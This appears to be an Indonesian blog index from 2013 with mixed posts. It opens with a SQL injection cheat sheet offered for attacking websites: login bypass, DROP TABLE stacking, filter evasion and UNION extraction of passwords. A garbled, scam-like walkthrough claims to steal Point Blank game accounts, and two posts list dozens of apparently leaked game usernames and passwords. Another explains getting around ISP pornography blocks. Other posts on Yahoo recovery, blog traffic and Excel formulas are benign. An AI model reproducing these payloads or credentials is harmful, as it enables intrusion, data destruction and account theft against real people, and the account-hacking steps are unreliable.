Tuesday 31 December 2013

Tutorial SQL Injection

07:13 apri No comments

Udah pada tau kan soal SQL injection?
Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).
Oke, lets’ begin
Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#
Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan
2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist
+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya
3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–
4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’
+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)
5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist
Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist
6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.
Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel
Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel
Read more »

Wednesday 27 November 2013

Mengembalikan Akun Email Yahoo yang di-Hack

09:16 apri No comments
Susah membayangkan bagaimana rasanya ketika email kita dihack oleh orang-orang yang tidak bertanggungjawab. Kita terpaksa harus mengklarifikasi ke teman-teman yang dikirimi email fishing yang biasanya meminta kita mengirimkan sejumlah uang yang dibutuhkan ke alamat tertentu.
Untuk mengatasi itu, YahooMail telah memberikan beberapa langkah yang barangkali bisa kita gunakan untuk mengatasi masalah tersebut.
Berikut ini langkah-langkah yang barangkali bisa kita gunakan untuk mengembalikan YahooMail kita yang telah dihack seseorang.
1. Masuk ke halaman login YahooMail

2. Di halaman login, klik “Tidak Bisa Mengakses Account”

3. Setelah mengklik “Tidak Bisa Mengakses Account” akan muncul panel berikut ini.

4. Kita bisa mencoba dua pilihan yang tersedia, yakni (1) “saya lupa sandi saya”; atau (2) “Tampaknya akun saya digunakan orang yang tidak berwenang”; seperti tertera di gambar di atas.
Jika akun kita memilih pilihan kedua “Tampaknya akun saya digunakan orang yang tidak berwenang”, tampilan selanjutnya setelah kita menekan tombol “berikutnya” adalah sebagai berikut.

5. Setelah muncul laman di atas, masukkan ID Yahoo dan jangan lupa berikut kode yang tertera di bawahnya. Selanjutnya klik tombol “Berikutnya”. Setelah itu semua selesai, akan muncul panel seperti dibawah.

6. Ada dua pilihan yang tertera, yakni melalui email yang telah kita sertakan sebelumnya atau “Saya tidak bisa mengakses satupun dari yang disebut di atas”. Untuk percobaan ini, saya memilih “Saya tidak bisa mengakses satupun dari yang disebut di atas”. Selanjutnya klik tombol “Berikutnya” dan munculah panel di bawah.

7. Biasanya, Yahoo meminta kita untuk memasukkan dua pertanyaan rahasia. Pertanyaan-pertanyaan itu akan kembali harus kita jawab pada saat ini. Jika sudah, seperti biasa, klik tombol, “Berikutnya”.

8. Jika sudah berhasil, gambar di atas akan muncul dan kita bisa dengan bebas memasukkan sandi baru. Usahakan sandi yang kita gunakan berisi kombinasi huruf, angka, dan simbol, yang diganti secara periodik.
Kembali klik tombol “Berikutnya” hingga muncul gambar berikut ini.

9. Klik tombol “Lanjutkan” untuk memperbaiki informasi personal anda.


10. Seperti biasa, setelah itu klik “lanjutkan” atau “berikutnya” sehingga muncul laman di bawah.

11. Pada laman itu, kita bisa langsung melanjutkan, dengan mengklik tombol “Lanjutkan” atau mempertebal pengamanan akun kita dengan menggunakan “segel masuk”. Klik “Informasi Lebih Jauh” untuk membuat segel masuk. Setelah mengklik itu, anda akan masuk pada laman segel seperti dibawah ini.

12. Klik tombol “Mulai Sekarang”.

Ada dua bentuk segel, yakni segel dalam bentuk teks dan segel dalam bentuk gambar (lihat gambar di bawah).

Segel dalam bentuk teks terdiri dari tiga kolom dengan maksimal teks yang tertulis 21 karakter. Teks itu bisa kita isi dengan informasi-informasi yang hanya kita yang tahu.
Jika memilih segel dalam bentuk gambar, tinggal masukkan gambar dengan ukuran maksimal 2 MB.
ini adalah preview setelah saya memasukkan segel dalam bentuk gambar.

kita sudah bisa menggunakan email kita kembali.

Catatannya, ini adalah prosedur yang disarankan oleh Yahoo. Saya tidak tahu jika ternyata dalam praktiknya ada hal-hal yang kurang diantisipasi oleh Yahoo atau kalau ternyata si hacker telah lebih dulu mengubah semua informasi pribadi kita.
Tapi setidaknya, ini adalah langkah yang patut dicoba manakala kita dihadapkan pada masalah akibat dihack-nya email kita.
Terakhir, selamat mencoba, semoga berhasil!
Read more »

Monday 21 October 2013

Cara Meningkatkan Pengunjung Blog

11:53 apri No comments

Posted by Erda Meikeyana Tuesday, 10 September 2013 0 komentar
Jika anda memiliki sebuah toko apa hal yang berperan penting dalam kemajuan toko anda? Tentu saja adanya pengunjung. Begitu pula dengan blog, jika tak ada pengunjung apa jadinya sebuah blog? mungkin blog anda akan menjadi suatu yang sia-sia walau isinya bermanfaat.

Traffic pengunjung sangat mempengaruhi rangking blog anda. Semakin banyak pengunjung maka akan semakin kecil rangking yang di dapat. Itu artinya semakin besar peluang mendapatkan keuntungan untuk anda yang melakukan monetisasi pada blog.
Banyak website yang menawarkan jasa meningkatkan traffic pengunjung secara instan. Memang ada kalanya  website tersebut bisa meningkatkan traffic, tapi itu sangat sedikit sekali yang benar. Justru lebih banyak website yang hanya ingin mengambil untung dari anda alias hanya menipu.

Biasanya website seperti itu hanya akan mengambil data anda untuk kepentingan mereka sendiri. Maka dari itu lebih baik kita memakai cara-cara yang sederhana namun terbukti dapat meningkatkan pengunjung, walau tidak instan tapi aman.

Cara Meningkatkan Pengunjung Blog


Untuk itu mari kita lihat bagaimana trik untuk meningkatkan traffic pengunjung pada blog anda.

Cara Meningkatkan Pengunjung Blog

1. Buatlah Konten yang Berkualitas

 Konten atau artikel adalah unsur utama dari sebuah blog. Terkadang kita sering kali menemukan artikel yang sangat panjang tapi terlalu banyak kata-kata yang tidak diperlukan sehingga sulit untuk dipahami.

Memang artikel yang baik adalah artikel yang panjang, tapi kita harus memperhatikan apa yang sebenarnya akan dijelaskan pada artikel tersebut dan apa kata-kata yang tepat untuk digunakan sehingga tidak berbelit-belit agar pembaca mudah menyerap.

Konten atau artikel sebaiknya berisi jawaban dari sebuah pertanyaan atau tips-tips. Misalnya hal yang sedang menjadi topik hangat saat ini adalah gadget terbaru. Maka sebaiknya anda menuliskan tentang gadget terbaru tersebut mulai dari harga hingga yang lainnya.

Jangan lupa juga memperhatikan judul dan keyword yang dipakai pada artikel tersebut. Kenapa? karena ini sangat berpengaruh untuk meningkatkan pengunjung. Maka sebaiknya anda melakukan riset terlebih dahulu sebelum menentukan judul dan keyword yang akan dipakai.

Gunakanlah google adwords untuk meriset judul/keyword. Usahakan mengupdate artikel secara rutin agar blog anda tidak sepi pengunjung.

 2. Segera Daftarkan Blog pada Serch Engine

Akan percuma rasanya jika sudah memperhatikan kualitas konten tetapi tidak mendaftarkan blog anda pada search engine. Karena jika tidak terdaftar, maka otomatis blog anda tidak dapat ditelusuri pada search engine karena tidak terindex oleh search engine tersebut.

3. Loading Harus Cepat

 Apa yang anda lakukan bila mendapatkan blog atau website yang loadingnya lama? Ya! pasti anda akan kesal dan mengeluh. Lalu setelah itu anda mengklik tombol close dan mencari artikel lain yang lebih cepat loadingnya.

Jangan sampai itu terjadi pada blog anda, karena bisa-bisa pengunjung merasakan hal yang sama. Itu sangat buruk dan bisa mempengaruhi rangking blog anda. Usahakan pilih template yang ringan agar membuat pengunjung anda merasa nyaman dalam menelusuri blog anda.

 4. Perhatikan Desain Blog

 Siapa yang tidak tertarik dengan desain yang menarik? Desain yang unik dan menarik tentu saja membuat pengunjung merasa nyaman ketika melihat-lihat isi blog.

Semua tertata rapi dan enak dilihat karena ada navigasi yang jelas, terlebih lagi jika desainnya sesuai dengan isi dari blog tersebut. Jadi jangan menyepelekan desain pada blog agar pengunjung semakin banyak yang tertarik mengunjungi blog anda.

5. Manfaatkan Jejaring Sosial

 Jejaring sosial adalah hal yang sangat digemari saat ini oleh semua kalangan. Hanya dengan online kita dapat berbagi informasi menarik kepada teman-teman, mendapatkan teman baru, membuat grup,  dan masih banyak yang dapat kita lakukan.

Magnet yang terdapat pada jejaring sosial memang sangatlah tidak terduga, karena saat jejaring sosial yang satu diluncurkan selang beberapa bulan/tahun muncul jejaring sosial lain.

Dan ini membuat orang-orang di masa kini tidak terlepas dari gadget mereka yang sudah difasilitasi dengan aplikasi jejaring sosial seperti facebook, twitter, dll.

Melihat dari boomingnya jejaring sosial maka anda dapat memanfaatkannya untuk meningkatkan jumlah pengunjung, jd setelah mempublikasi artikel jangan lupa bagikan artikel di jejaring sosial/media sosial.

6. Sering-Sering Melakukan Blogwalking

 Jangan merasa blog anda paling bagus dan paling lengkap, sehingga anda malas meminta backlink pada blogger lain. Blogwalking sangat penting untuk mendapatkan backlink dari blog lain. Ini adalah hubungan timbal balik yang dilakukan seorang blogger untuk meningkatkan traffic pengunjung.

Bagaimana dengan Cara Meningkatkan Pengunjung Blog yang kami jelaskan tadi? tidak sulit bukan? jika anda mau bersabar dalam menerapkannya, dapat dipastikan pengunjung blog akan semakin meningkat. Sekian yang dapat kami ulas, selamat mencoba!
Read more »

Thursday 17 October 2013

Cara Mengembalikan ID Gemscool Point Blank yang di Hack

13:15 apri No comments
Apa anda merasa ID Gemscool di curi atau di Hack? Mungkin beberapa tips Cara Mengembalikan ID Gemscool Point Blank yang di Hack dibawah ini bisa meyelesaikan masalah meskipun sebenarnya tidak 100% bisa berjalan mulus, tapi tentunya yang namanya usaha yah pasti lebih baik dari pada pasrah dan tidak melakukan apa2.
Oh ya ID Gemscool ini sembenarnya merupkana informasi login untuk menggunakan semua game online yang ada di gemscool seperti Game Online Point Blank (PB), FreeStyle Street Basketball, Yulgang, Apocalyps, Atlantica, Lost Saga, Mako, dll. Jadi intinya jika ID Gemscool anda sudah di Hack maka kemungkinan besar char Game Online lain anda juga sudah di sabotase.

Adapun beberapa cara untuk mengembalikan ID Gemscool yang di curi/kena hack ialah:
1. Cara pertama dengan Reset password melalui fasilitas Lupa Password
2. Cara kedua dengan mengirim Email ke id@gemscool.com, tentunya untuk memberi konfirmasi ke email tersebut anda harus melengkapi data selengkap-lengkapnya (Jangan sampai salah yah…), pastikan saat mengirim pesan gunakan email yang sama dengan email saat pertama kali daftarkan di Gemscool dan pastikan  juga mengirim email disaat jam kerja agar mudah di proses (kalau bukan jam kerja atau informasi yang di berikan ada sedikit saja salah, takutnya nanti email ga di tanggapin/langsung di delete aja). Nah Adapun informasi yang perlu anda berikan pada Email ialah seperti.
  • ID Gemscool
  • Nickname PB / atau game lain
  • Nama Anda
  • Alamat lengkap
  • No Telepone
  • No Handphone
  • Tanggal lahir
  • Email (Yang anda gunakan untuk Mendaftarkan Id Gemscool pertama kali)
  • Security Code / Question & Answer:
  • Kode voucher yang telah di isi sebelum dan sesudah car bermasalah.
  • Kalau mau nambahin cerita kronoli kejadiannya lebih bagus lagi.
Info: bagi yang merasa proses sangat sulit itu dikarenakan
  • Email asal buat, salah dan tidak aktif.
  • Data2 penting : misalnya security code, tidak ada yang diingat.
  • Jual Beli ID.
  • Share ID.
3. Cara ketiga dengan Konfirmasi Pihak Gemscool di
PT. KREON,
Gedung Gandaria 8 20th Floor,
Jl. Sultan Iskandar Muda, Kebayoran Lama Jakarta Selatan 12240
No Tlp : 021-2930 3499 / Fax : 021-2930 3496
Read more »

Cara Hack PB Murni tanpa software terbaru 2013

13:12 apri No comments
Posted by Farhan Hamzah On 1/02/2013 06:01:00 PM
saya mempersembahkan Artikel ini khusus untuk
yang mau berusaha dan sedikit mikir ( karena cara ini cukup sulit )
Walau sulit ini sudah terbukti berhasil.kalo ada kesalahan sedikit saja
pasti gagal,Namun Kalau anda ada kemauan untuk bekerja keras dalam meraih
keberhasilan pastikan anda focus dan jeli dalam melaksanakannya
Cara ini mungkin hanya akan ada di blog gozine saja
karena cara ini adalah cara yang saya temukan sendiri
Nah Perlu bukti.anda tinggal Lihat saja Berapa ID saya di Blog jual beli
Saya baru kasih Artikel ini karena saya sudah puas dengan apa
yang sudah saya hack dan saya curi.
Sabar yahhh kalo sedikit susah.Berikut Caranya

1.Tentukan Korban  berikut contoh : Nickname : korban123
                                                          ID            : ID korban 123
                                                        Pangkat     :pangkat korban
2.Pangkat yang anda gunakan harus sesuai dengan pangkat korban
   contoh : kalo pangkat diamond anda juga harus diamond :
   misalkan : diamond 1 dengan diamond 2 juga bisa
3.Buka cmd ( start-run-ketikan cmd )
4.Kalo udah ketikan perintah seperti ini : ping www.gemscool.com
5.Nahh nanti kan ada angka atau ping dari perintah tersebut.
6.Angka atau ping tersebut menandakan  lokasi server anda
7.Bukalah Notepad.Ketikan code berikut ini
   Nickname korban : korban123
   Id korban  :ID korban 123
   pangkat korban
8.save as dengan ekstensi : .Pb   misalkan : korban.Pb
9.Masuk mozilla firefox.pilih option
  dalam pengaturan pilihlah tool lalu pilih lagi advanced
  setelah masuk pilihlah network
10.Di sini akan ada beberapa pilihan.yang anda harus pilih adalah : use proxy with setting
     dalam form IP.isikan dengan ping atau angka yang di dapat lewat cmd tadi
     portnya wajib pilih : 98 ( ini port resmi gemscool )
11.Setelah selesai.anda di wajibkan untuk masuk ke google crome
     atau browsing yang beda dengan mozilla
12.Dalam browsing kunjungilah www.whatismyip.com
13.disitu anda akan melihat Ip yang akan anda gunakan
14.salinlah Ip itu lalu masuk lagi ke mozilla firefox ( wajib )
15.Ganti IP yang tadi anda masukan ke dalam mozilla dengan ping pb
     menjadi IP yang anda salin tadi di www.whatismyip.com
16.Daftar lah di www.driveHQ.com

17.masuklah ke tab yang baru dengan mengirim email ke
     admin@gemscool.com. isi pesannya yaitu : Izin atau permition
18.setelah anda mengirim email.barulah masa-masa bahagia anda akan dimulai
19.Uploadlah file yang sudah anda save dengan notepad...oploadnya di yahoo
20.Lampirkan emailnya ke email ini : mailer_daemon@yahoo.com
21.kalo ga kekirim berarti anda harus mengirim email alternatif ke
     admin@gemscool.com
22.selanjutnya bila anda sudah mendaftar driveHQ.apa yahhh ????
     (jangan deg-degan yahh)soalnya ini adalah tahap semi final
23.pastikan anda sudah menyetting proxy nya sesuai dengan ket no15
24.Bila No.23 gagal bisa di pastikan ID point blank anda akan terkena banned
25.maka dari itu cobalah terlebih dahulu dengan menggunakan
     id yang baru saja anda buat.contohnya.tengkorak
26.Bila mencoba dengan tengkorak anda berhasil.
     Bisa di pastikan anda juga dapat berhasil di langkah berikutnya
27.Sesudah anda yakin dengan langkah-langkahnya.anda hanya tinggal
     login ke dalam account drive HQ anda.
     lalu kirimlah email lewat webmail ke email berikut :
     "PointBlankGemscool"
     caranya adalah setelah anda masuk ke dalam account anda
     pilihlah ke dalam email.setelah  masuk ke dalam email
     anda harus mengirim email alias sent
     cara sentnya yaitu dengan menekan "New"
     lalu pilih mail
28.Isi Pesannya sebagai berikut :
     To : PointBlankGemscool
     subject : permited retreiving ID my friend
     Isi pesannya : -ID korban
                           -nickname
                           -Pangkat korban
                           -pasword korban ( paswordnya harus ditulis : generatorpasword )
                           -ID anda
                           -nickname anda
                           -pangkat anda
                           -pasword anda ( pasword pb anda )
29.eitt jangan senang dulu karena bila anda hanya mengirim satu email
     saja.kemungkinan id andalah yang akan terkena banned oleh admin
     gemscool karena di anggap penipuan.
30.maka dari itu buktikanlah bahwa anda sudah mengirim email permisi
     yang tadi anda kirim ke admin@gemscool.com sebagai bukti bahwa
     anda telah mendapatkan izin dari sang admin gemscool
     berikut isi pesan kedua
     Ohh iya pesan kedua Di kirim ke alamat email yang berbeda yahh
     berikut emailnya : EntrypermitGemscool
     isi pesannya yaitu
     To : EntrypermitGemscool
     subject : Permition to pointblankgemscool@drivehq.com
     isi pesannya yaitu :
     Saya sudah meminta izin dengan melalui email "admin@gemscool.com"
     maka dari itu saya meminta saudara untuk mengirimkan
     email konfirmasi izin atas "emailsaya@yahoo.com" yang telah
     mengirimkan email ke pihak gemscool yang beratasnamakan
     "PointBlankGemscool@drivehq.com"
     Saya Mohon kepada saudara untuk mengirimkan konfirmasi kode
     izin saya dengan mengirim email ke "emailsaya@yahoo.com"
31.Bila anda sudah mendapatkan email balasan dari entrypermitgemscool
     (kira-kira 1-2 hari lahh ya) isi pesan yang anda terima berupa
     konfirmasi kode
32.Jangan Panik setelah ID Pb anda terkena Banned
     karena saya juga terkena banned terlebih dahulu
     maka dari itu setelah ID anda terkena banned
     Barulah anda kirim kan email konfirmasi
     yang anda terima dari entrypermitgemscool
     tadi.Berikut contohnya
     To : pointblankgemscool
     subject : Banned Blockir
     isi pesannya yaitu :
     "Saya akan membuktikan bahwa saya tidak menipu kepada anda
      Berikut pembuktian saya.
      Konfirmasi Code : masukan kode konfirmasi anda dengan tepat
      dan jangan sampai salah memasukan kode konfirmasi"
32.Setelah anda mengirim email itu
     kira-kira setelah 1-2 jam
     anda akan mendapatkan email balasan seperti ini
     "sorry for my rudeness because it has been blocked
      pointblank you identify.this I include a request that you ask
      Nickname korban : nickname korban
      pasword korban :pasword korban berupa pasword korban yang asli
      pangkat : pangkat korban berupa pangkat asli dari korban
      Email (email ini adalah email yang akan anda gunakan untuk lupa pasword)
      emailnya biasanya adalah : email yang anda gunakan untuk mengirim email
      ke pointblankgemscool
      secara otomatis email dan security code anda akan di ganti 
      berikutnya anda hanya tinggal mengganti pasword yang di berikan
      gemscool kepada anda
33.Terakhir anda tinggal mengganti pasword pb korban anda
      yang telah di berikan gemscool pula.
34.Jangan lupa berterimakasih ke pada saya yang telah bersusah
      payah bekerja,dan jangan lupa pula menglike fanPage 
      yang telah saya siapkan

Bila anda kurang mengerti silahkan langsung komentar 
atau kirim email seperti biasa ke email saya 
Semoga artikel ini tidak anda gunakan secara berlebihan
dan harus anda batasi karena kalau berlebihan
bisa-bisa cara ini malah tidak bekerja lagi
terimakasih.

 Note : Mohon maaf karena mailer bot saat ini tidak aktif dan tidak
bekerja lagi.kemungkinan karena banyaknya permintaan yang tidak
valid.
Read more »

Tuesday 8 October 2013

RUMUS-RUMUS FORMULA DALAM MICROSOFT EXCEL

14:01 apri No comments
Jenis Data
1.      Data numeric : data yang dapat dihitung
2.      Data text : data yang tidak dapat dihitung, gunakan tanda petik tunggal (‘)

Format Tampilan Data
1.      Sorot/Blok sel yang akan di format
2.      Klik menu Format dan klik cells (Ctrl +1), bisa juga menggunakan mouse
3.      Klik salah satu : Number, Aligment, Font, Border, Pattern, dan Protection

Number :
Digunakan untuk memformat nilai numerik, yang terdiri atas beberapa angka yang mewakili angka, nilai satuan mata uang, tanggal, waktu, persentase dan sebagainya.
Alegment :
Digunakan untuk mengatur suatu sel atau range dengan posisi rata kiri, rata kanan, dan rata tengah. Juga mengatur derajat kemiringan data.
Font :
Untuk memilih jenis, ukuran,tampilan warna, dan efek khusus huruf.
Border :
Untuk membuat bingkai atau menambah garis pembatas pada suatu sel atau range.
Patterns :
Untuk memberi warna dan corak latar belakang sel atau range.

Mengubah Nama Sheet
1.      Klik sheet yang akan diubah namanya, klik menu Format pilih sheet
2.      Klik Rename, klik nama baru, enter

Menambah Sheet Baru
1.      Klik kanan (mouse) pada sheet
2.      Klik Insert, pilih Workshet, Klik OK
3.      Untuk memindahkan sheet, klik (tahan) tarik sheet ptempat yang diinginkan

Membuat Grafik
1.      Blok data yang akan dibuat menjadi grafik
2.      Klik insert,Klik chart
3.      Pilih type chart yang diinginkan, lalu next
4.      Pilih datanya yang dibaca Rows atau Colums pada series in untuk menentukan pembacaan data kolom atau baris, lalu klik next
5.      Lalu pilih Title untuk buat judul grafik,
a.       Axes : sumbu X dan Y
b.      Gridlines : untuk garis-garis didalam grafik
c.       Legend : untuk keterangan nama grafik
d.      Data labes : untuk menampilkan nilai pada gambar grafik
e.       Data table : menampilkan data grafik
6.      Bila telah benar klik Next
7.      Tentukan letak grafik As new sheet (lembar kerja baru) atau As object in (lembar kerja yang aktif), setelah selesai klik Finish.

Membuat Catatan & Menggunakan Filter
a.       Letakkan kusor pada sel yang diinginkan Klik kanan pada mouse Insert Comment
b.      Letakkan kusor pada sel yang akan dikoreksi, pada menu Data klik Filter, klik AutoFilter = Untuk memparmudah koreksi
Ekspresi Atau Pernyataan Logika
=
<=
>=
<> 
Sama dengan
Lebih kecil
Lebih besar
Lebih kecil Sama dengan
Lebih besar Sama dengan
Tidak sama dengan
A1=B1
A1<B1
A1>B1
A1<=B1
A1>=B1
A1<>B1
+
-
*
/
%
^
&
: atau ;
, (dan)
“ (maka)
Penjumlahan
Pengurangan
Perkalian
Pembagian
Persen
Pangkat
Dan
Sebagai batas range
Penggabung renge
Pernyataan
1+2
2-1
2*2
2/2
20%
2^2
“Na” & “ma”
A1: E9
Sum(A1:A7,C1:C7
(3)
(1)
(4)
(1)
(0,2)
(4)
(Nama)

Menggunakan Fungsi Matematika Dan Statistika
Sum
Max
Min
Average
Sumif
Counta
Countif
Penjumlahan
Nilai tertinggi
Nilai terendah
Rata-rata
Penjumlahan yang memiliki kreteria tertentu
Menghitung sel yang terisi data
Menghitung sel yang terisi data dengan kreteria tertentu

Operator Logika
AND (dan)
OR (atau)
=And(B5>1000,C5>15%)
=Or(B5>1000,C5>15%)

Fungsi Logika If
IF (Jika)
=IF(B6="M","Menikah",IF(B6="B","Belum"))

Fungsi If Dengan Dua Ekspresi
If(Or(
IF(AND(
=IF(OR(E6="PIMPINAN",E6="MANAGER"),7%*F6,0)
=IF(AND(E6="STAFF",D6="nikah"),5%*F6,0)

Fungsi Teks/Strings
Left (kiri)
Right (Kanan)
Mid (tengah)
=Left(B2,2)
=Right(B2,2)
=Mid(B2,2)

Fungsi Vlookup & Hlookup
Vlookup
Hlookup
F4
Untuk data ke atas
Untuk data mendatar
Untuk mengunci data

Read more »

Monday 30 September 2013

Bagi-bagi password lostsaga

12:00 apri No comments
id:rizky200997 pw:oega1997 
id:anexer pw:kawali021
 ID: litosfer321 pass: nh1982 arghsweet coatude10 Major 
id:dayan48 pass:kimcil48 
ID : mailendra29 PW : macbeth1999 
id:kargo900 pw:asu900
 id:cigoronaldo pw:b11no238
 id:babi080808 pw:080199d0n1
 id:espega1 pw:pokek321 
id:asu555lo pw:aghuz123
ID : indradx1 PW : sarang123
ID : kucing00214 PW : b11no238
ID :: tengkorak72 : PW : produta123
 ID : keup1933 PW : bagus100 
ID : babi080808 PW: 080199d0n1
 ID : pbifmaster PW : m4estro888 
ID:90mbr3nk PW:kocek123 
ID : anexer PW : kawaii021 arif33kartoe gems6532 ucoxcation h4fizul48r4r 
id:josmoker pass:nothackers 74
 ID:arisboy Pas:Penantian11 1
 id:willycapekz pass:willycapek z0 tuh pangkat M1G3 | id:yonatan126 pass:100300vin LetcoolG3 | yang M1G2 id = monikha09 pw = 140308eca
 ID: 2ryan09 pass: bagus123 
id:bewok434 pass:azka12345 
id batukajang89 pw FoxEzra1st kondomplerr pointblank12 
ID dracosolid dan pass legendary219
Id:Fifzzz Pw:05041..
Read more »

Bagi-bagi char PB dan password

11:56 apri No comments

d:knightdead21 pw:wirawan
id:rizky200997 pw:oega1997
id:anexer pw:kawali021 ID:
litosfer321 pass: nh1982
arghsweet coatude10 Major
id:dayan48 pass:kimcil48 ID :
mailendra29 PW : macbeth1999
id:kargo900 pw:asu900
id:cigoronaldo pw:b11no238
id:babi080808 pw:080199d0n1
id:espega1 pw:pokek321
id:asu555lo pw:aghuz123 ID :
indradx1 PW : sarang123 ID :
kucing00214 PW : b11no238 ID ::
tengkorak72 : PW : produta123
ID : keup1933 PW : bagus100 ID :
babi080808 PW: 080199d0n1 ID :
pbifmaster PW : m4estro888
ID:90mbr3nk PW:kocek123 ID :
anexer PW : kawaii021
arif33kartoe gems6532
ucoxcation h4fizul48r4r
id:josmoker pass:nothackers74
ID:arisboy Pas:Penantian111
id:willycapekz pass:willycapekz0
tuh pangkat M1G3 |
id:yonatan126 pass:100300vin
LetcoolG3 | yang M1G2 id =
monikha09 pw = 140308eca ID:
2ryan09 pass: bagus123
id:bewok434 pass:azka12345 id
batukajang89 pw FoxEzra1st
kondomplerr pointblank12 ID
dracosolid dan pass
legendary219 Id:Fifzzz
Pw:05041999asd ID : anexer PW :
kawaii021 Id : r1sk1c4hy0 pass :
30april97 Id: halocacad99 Pw :
bonek11 ID:bayun888
pass:l147852l

id:zasnae
ps:gendang098

Read more »

Membuka Situs Web Porno Yang Di Blokir Operator

11:44 apri No comments

Written By Andre Lee on Selasa, 30 April 2013 | 07:38 | with: 15 Comment

Membuka Situs Web Porno Yang Di Blokir Operator

SHADOWS || Nah para sobat pasti pernah membuka situs porno bukan??? hayooo ngaku.. wkwkwk saya saja suka hehehehe.. Saya akan memberikan solusinya kepada para sobat untuk Membuka Situs Web Porno Yang Di Blokir Operator, sobat pasti tidak nyaman ketika sobat berselancar di internet untuk membuka beberapa situs atau web yang banyak di blokir oleh operator. Web proxy atau situs tak layak di akses lainnya, Yang pastinya sangat mengesalkan. Nah, untuk itu demi kenyamanan teman-teman dalam berselancar SHADOWS akan memberi sedikit cara bagaimana membuka situs/website yang telah di blokir (Has been blocked) oleh operator jaringan seperti Three (3), Axis, Telkomsel, Indosat, XL, Speedy, Smartfren, AHA, Nawala dan lainnya. Nah Cara Membuka Situs Web Porno Yang Di Blokir Operator, ikuti langkah langkah di bawah ini.

1. Alat penjelajar / Browser:

Jika akses via PC dekstop : Gunakan Opera Browser terbaru, silahkan downlad  dan install Opera web Browser, dan coba gunakan untuk membuka situs-situs yang diblokir. Tapi jangan lupa aktifkan Opera Turbo nya.
Jika akses melalu mobile atau handphone. Gunakan UC browser, download dan instal, Apapun jenis situsnya Uc web mampu membukanya.

UC browser  << Download >>

2. Web proxy.

Web Proxy, sebuah layanan dimana kita membuka situs yang diblokir melalu situs tersebut, ada banyak situs web proxy yang tersedia, dan bahkan ada beberapa situs yang diblokir oleh internet provider atau Nawala Project, berikut beberapa Web Proxy yang bisa dicoba:

3. IP Proxy.

Cara lainnya bisa juga dengan mengatur IP Proxy pada Web Browser, jika kamu menggunakan Mozilla Firefox, maka untuk pengaturan IP Proxy pada menu “Option” > “Advanced” > “Network” > “Connection” pilih “Setting” > “Configure proxies to access the internet” pilih yang “Manual proxy configuration” lalu isikan IP dan Port Porxy nya, berikan tanda centang pada “Urge this proxy server for all protocols”. > OK > OK.
Untuk test : Coba akses Google, dan apakah IP Proxy berjalan dengan lancar, jika iya, silahkan membuka situs yang diblokir. Jika IP Proxy tidak berjalan dengan lancar, silahkan cari IP Proxy lainnya.
Berikut beberapa situs yang menyediakan IP Proxy gratis:

4. DNS PC

Cara lainnya selain yang di atas adalah mengganti DNS PC yang sobat miliki, situs-situs yang tidak bisa diakses merupakan hasil penyaringan melalui DNS tiap koneksi internet, antara lain DNS Nawala Project, DNS Indosat, dan lainnya.

Selesai sudah Bagaimana Cara Membuka Situs Web Porno Yang Di Blokir Operator untuk sobat nikmati berselancar dengan bebas semoga hari hari sobat penuh dengan keriangan di hati karena solusi sudah terbuka.... happy blogging.
Read more »

Cara Agar Bisa Membuka Situs Porno Yang Di Blok Oleh Modem

11:43 apri No comments
This summary is not available. Please click here to view the post.
Read more »

Sunday 29 September 2013

Apa Tempat Rahasia Aplikasi Windows Populer menyimpan Password

11:06 apri No comments
Dewasa ini pada saat dunia sedang dikuasai oleh teknologi yang bernama internet, kita semua pasti menggunakan satu atau lebih aplikasi internet mulai dari browser, email klient, sampai ke instant messenger. Kebanyakan aplikasi ini menyimpan informasi sensitif seperti nama pengguna (username), sandi (password) dilokasi pribadi mereka masing2 menggunakan metode enkripsi masing2. Hal ini untuk mencegah kerumitan memasuki mandat setiap kali selama proses otentikasi.
